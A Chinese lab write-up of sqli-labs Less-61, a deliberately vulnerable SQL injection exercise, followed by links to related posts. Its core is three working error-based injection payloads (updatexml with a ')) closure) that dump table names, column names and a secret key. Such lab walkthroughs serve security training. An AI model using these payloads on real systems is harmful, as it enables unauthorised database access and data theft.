sqli-labs-Less-61

SQLI-LAPS 实验记录

Less-61

这一关与上一关类似,只是闭合方式不同,为单引号加双括号的方式,依然采用报错注入的方式通关。

根据之前的经验,我们在命令行中采用单引号加双括号来闭合,使用报错注入命令:

sql 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) --+

结果如图所示,能够爆出表名SU367R5TLR。

接下来,我们继续使用该语句来进行注入,爆出数列名以及秘钥,语句如下:

  • 查询列名
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='SU367R5TLR'),0x7e),1)--+

查询结果为secret_CH6P。

  • 查询秘钥
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(secret_CH6P) from challenges.SU367R5TLR),0x7e),1) --+

查询如图所示,秘钥为RGPHim48wGuZe9NvjtVXnQ2f。
之后,将查询出的密钥输入页面下方的对话框中,就可以看到成功信息了。

相关推荐
treesforest4 小时前
IP定位技术在网络犯罪侦查中的应用与价值
网络·网络协议·tcp/ip·网络安全·ip归属地查询·反欺诈
笨鸟先飞,勤能补拙5 小时前
AI 赋能网络安全:技术全景、成熟度评估与实战案例
人工智能·python·安全·web安全·网络安全·sqlite·github
天桥下的卖艺者5 小时前
使用scitable包,两步生成逆概率删失权重(IPCW)
数据库·r语言
隔窗听雨眠5 小时前
AI原生数据库浪潮:国产数据库的架构重构与路径之争
数据库
数据库小学妹6 小时前
数据库选型实战:从数据类型到TCO成本,五维决策框架+九款产品横评
数据库·信创·国产数据库·数据库选型·oracle迁移
神龙天舞20017 小时前
MySQL 备库为什么会延迟好几个小时
android·数据库·mysql
笨鸟先飞,勤能补拙7 小时前
AI 赋能网络安全领域深度剖析
网络·人工智能·windows·安全·web安全·网络安全·github
HackTwoHub8 小时前
轻量化AI渗透武器库|ARTEX自主攻防系统、资产梳理、漏洞挖掘、链路分析全流程智能化落地
人工智能·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
丙氨酸長鏈8 小时前
Web前端入门第 问:JavaScript 一个简单的 IndexedDB 数据库入门示例
前端·javascript·数据库
独行侠影a8 小时前
APScheduler+Redis 分布式定时任务:解决多实例任务重复执行
数据库·redis·分布式